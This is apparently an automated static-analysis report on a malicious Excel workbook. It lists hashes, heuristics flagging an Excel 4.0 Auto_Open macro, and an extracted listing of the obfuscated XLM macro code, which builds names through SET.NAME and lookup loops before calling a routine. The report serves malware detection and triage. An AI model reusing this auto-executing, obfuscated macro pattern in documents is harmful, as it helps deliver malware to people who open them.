Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 425dd9395fd748d9…

MALICIOUS

Office (OLE)

35.5 KB Created: 2020-11-27 11:45:01 Authoring application: Microsoft Excel First seen: 2022-07-02
MD5: d68a4651413e68f2ec8761df99bf95f6 SHA-1: ad5014051ad31bebf9bcff08e6bbfefda5c5772b SHA-256: 425dd9395fd748d9515e851036d87e42889abd9cc9f5f5f6a881b8bb53b38584
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6617 bytes
SHA-256: 5d3b12200139bc5d57207a4706b96424033b7242f299691f5ca29cdebafb34d1
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  ZgpZ
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!A160 
' 0018     27 LABEL : Cell Value, String Constant - bdYRiVHJFuyw len=0 
' 0018     27 LABEL : Cell Value, String Constant - cIxYIOBjMNjb len=0 
' 0018     24 LABEL : Cell Value, String Constant - FknPkRxKJ len=0 
' 0018     25 LABEL : Cell Value, String Constant - gCTCDadfkW len=0 
' 0018     22 LABEL : Cell Value, String Constant - hNyPNLp len=0 
' 0018     21 LABEL : Cell Value, String Constant - JRSndG len=0 
' 0018     22 LABEL : Cell Value, String Constant - kiFmGTZ len=0 
' 0018     26 LABEL : Cell Value, String Constant - ksJkVswPXZF len=0 
' 0018     22 LABEL : Cell Value, String Constant - oqMcpFU len=0 
' 0018     27 LABEL : Cell Value, String Constant - PIpZeSGMHNVG len=0 
' 0018     25 LABEL : Cell Value, String Constant - PsJjfgRWOL len=0 
' 0018     25 LABEL : Cell Value, String Constant - QXRXRqpGGI len=0 
' 0018     20 LABEL : Cell Value, String Constant - qyuhQ len=0 
' 0018     24 LABEL : Cell Value, String Constant - TMUGltGGy len=0 
' 0018     22 LABEL : Cell Value, String Constant - vGSOQtb len=0 
' 0018     25 LABEL : Cell Value, String Constant - vMcYdKpPON len=0 
' 0018     26 LABEL : Cell Value, String Constant - VqAhSdrvbsL len=0 
' 0018     21 LABEL : Cell Value, String Constant - XanBeN len=0 
' 0018     26 LABEL : Cell Value, String Constant - yMxLePRJouT len=0 
' 0018     20 LABEL : Cell Value, String Constant - zXLNH len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  ZgpZ,S43,"",-16.00000000000000000000
'  ZgpZ,S44,"",-161.00000000000000000000
'  ZgpZ,S45,"",541.00000000000000000000
'  ZgpZ,S46,"",-943.00000000000000000000
'  ZgpZ,S47,"",-201.00000000000000000000
'  ZgpZ,S48,"",-862.00000000000000000000
'  ZgpZ,A73,"SET.NAME("cIxYIOBjMNjb",0+VALUE("0"))",""
'  ZgpZ,A76,"SET.NAME("hNyPNLp",cIxYIOBjMNjb)",""
'  ZgpZ,A81,"SET.NAME("QXRXRqpGGI",cIxYIOBjMNjb)",""
'  ZgpZ,A83,"SET.NAME("JRSndG",COUNTA(TMUGltGGy))",""
'  ZgpZ,A85,"SET.NAME("vGSOQtb",COUNTA(yMxLePRJouT))",""
'  ZgpZ,A88,[],""
'  ZgpZ,A93,"SET.NAME("VqAhSdrvbsL","")",""
'  ZgpZ,A95,"hNyPNLp",""
'  ZgpZ,A100,"SET.NAME("PIpZeSGMHNVG",HLOOKUP("*",TMUGltGGy,hNyPNLp,FALSE))",""
'  ZgpZ,A105,"XanBeN",""
'  ZgpZ,A107,"SET.NAME("qyuhQ",cIxYIOBjMNjb)",""
'  ZgpZ,A112,[],""
'  ZgpZ,A116,"qyuhQ",""
'  ZgpZ,A118,"vMcYdKpPON",""
'  ZgpZ,A120,"bdYRiVHJFuyw",""
'  ZgpZ,A122,"zXLNH",""
'  ZgpZ,A124,"SET.NAME("oqMcpFU",VALUE(HLOOKUP("*",yMxLePRJouT,zXLNH,FALSE)))",""
'  ZgpZ,A127,"gCTCDadfkW",""
'  ZgpZ,A132,"VqAhSdrvbsL",""
'  ZgpZ,A135,"QXRXRqpGGI",""
'  ZgpZ,A140,NEXT(),""
'  ZgpZ,A144,"ksJkVswPXZF",""
'  ZgpZ,A148,[],""
'  ZgpZ,A151,"kiFmGTZ",""
'  ZgpZ,A154,NEXT(),""
'  ZgpZ,A158,RETURN(),""
'  ZgpZ,A186,"SET.NAME("PsJjfgRWOL",A73)",""
'  ZgpZ,A188,"TMUGltGGy",""
'  ZgpZ,A193,"SET.NAME("yMxLePRJouT",R40C15)",""
'  ZgpZ,A198,"SET.NAME("kiFmGTZ",206)",""
'  ZgpZ,A203,"SET.NAME("FknPkRxKJ",1)",""
'  ZgpZ,A205,PsJjfgRWOL(),""
'  ZgpZ,A206,HALT(),""